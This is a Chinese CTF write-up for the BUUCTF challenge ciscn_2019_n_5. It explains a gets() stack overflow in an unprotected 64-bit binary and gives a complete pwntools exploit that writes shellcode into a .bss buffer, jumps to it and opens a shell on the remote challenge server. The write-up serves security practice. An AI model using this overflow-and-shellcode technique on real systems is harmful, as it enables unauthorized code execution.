[BUUCTF]PWN20——ciscn_2019_n_5
2024-10-16 03:54:37
[BUUCTF]PWN20——ciscn_2019_n_5
步骤:
例行检查,64位,没有开启任何保护
试运行一下程序,看看程序的执行情况
64位ida载入,找到main函数,
逻辑很简单,第一次让我们输入名字,限制输入长度为0x64,看一下name参数,发现name在全局变量bss段上
第二次输入利用gets,没有限制长度,可以对v4造成溢出
利用过程
利用第一个输入点,往name参数里写入shellcode
context(arch='amd64',os='linux') #用来导入pwntools模块
shellcode=asm(shellcraft.sh()) #利用pwntools模块自动生成shellcode
r.sendlineafter('tell me your name',shellcode) #往name中写入shellcode
利用第二个输入点,让v4溢出到name参数地址,去执行shellcode拿到shell
payload='a'*0x28+p64(0x601080) #让v4溢出到name参数地址
r.sendlineafter('What do you want to say to me?',payload)
exp
from pwn import*
r=remote('node3.buuoj.cn',27785)
context(arch='amd64',os='linux')
shellcode=asm(shellcraft.sh())
r.sendlineafter('tell me your name',shellcode)
payload='a'*0x28+p64(0x601080)
r.sendlineafter('What do you want to say to me?',payload)
r.interactive()
最新文章
- Android中的数据保存
- 在html 中嵌入优酷视频
- http://www.cnblogs.com/softidea/p/5631763.html
- VIM替换、截取及追加操作
- Apache Apex
- poj1819Disks
- Jquery获得下拉框的值
- php var_export与var_dump 输出的不同
- Setup Project 安装项目
- Get Files from Directory
- HDU2054JAVA
- Tiny Spring 分析一
- javaWEB总结(8):自定义GenericServlet
- 使用eclipse和JavaFX Scene Builder进行快速构建JavaFX应用程序
- 理解WindowManagerService
- Photoshop合成雪景天使美女照片
- 【JVM】类加载机制
- VS下.net开发常用扩展、配置
- LeetCode算法题-Reverse String(Java实现)
- php 获取IP地址 并获取坐标lat lng 并获取到所在地区